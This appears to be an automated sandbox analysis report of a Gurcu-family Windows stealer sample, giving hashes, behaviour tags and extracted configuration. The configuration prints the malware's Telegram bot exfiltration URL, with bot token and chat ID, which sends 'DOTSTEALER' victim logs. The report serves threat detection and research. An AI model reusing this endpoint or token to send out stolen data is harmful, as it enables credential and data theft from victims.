General
-
Target
c5e1fd07be471ee2a06dbf2871be795fa09f1023a282c3b428ba4ea61a9ae596.exe
-
Size
5.6MB
-
Sample
241206-2m2zlsxqbj
-
MD5
63fdb37fe9bef5bf227388ff266128e3
-
SHA1
4e07d5d4cd852890eec051be59f596d9a8c91354
-
SHA256
c5e1fd07be471ee2a06dbf2871be795fa09f1023a282c3b428ba4ea61a9ae596
-
SHA512
d72cf6499c7ec6639ad980dd049eca2052a95714fd54e88ad17af1bed4f1b7c1a20a1fdaf35c129a919fee4ec6e89471d56c4e4f5cdd04ff29a820753eb5bdab
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Ucz:adOuK6mn9NzgMoYkSIvUcwti7TQlvcie
Static task
static1
Behavioral task
behavioral1
Sample
c5e1fd07be471ee2a06dbf2871be795fa09f1023a282c3b428ba4ea61a9ae596.exe
Resource
win7-20240903-en
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7912788699:AAGD1HW4P2288HKKYEhpShtetd37D8GqFZo/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Targets
-
-
Target
c5e1fd07be471ee2a06dbf2871be795fa09f1023a282c3b428ba4ea61a9ae596.exe
-
Size
5.6MB
-
MD5
63fdb37fe9bef5bf227388ff266128e3
-
SHA1
4e07d5d4cd852890eec051be59f596d9a8c91354
-
SHA256
c5e1fd07be471ee2a06dbf2871be795fa09f1023a282c3b428ba4ea61a9ae596
-
SHA512
d72cf6499c7ec6639ad980dd049eca2052a95714fd54e88ad17af1bed4f1b7c1a20a1fdaf35c129a919fee4ec6e89471d56c4e4f5cdd04ff29a820753eb5bdab
-
SSDEEP
98304:aGl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Ucz:adOuK6mn9NzgMoYkSIvUcwti7TQlvcie
-
Gurcu family
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Deletes itself
-
Loads dropped DLL
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-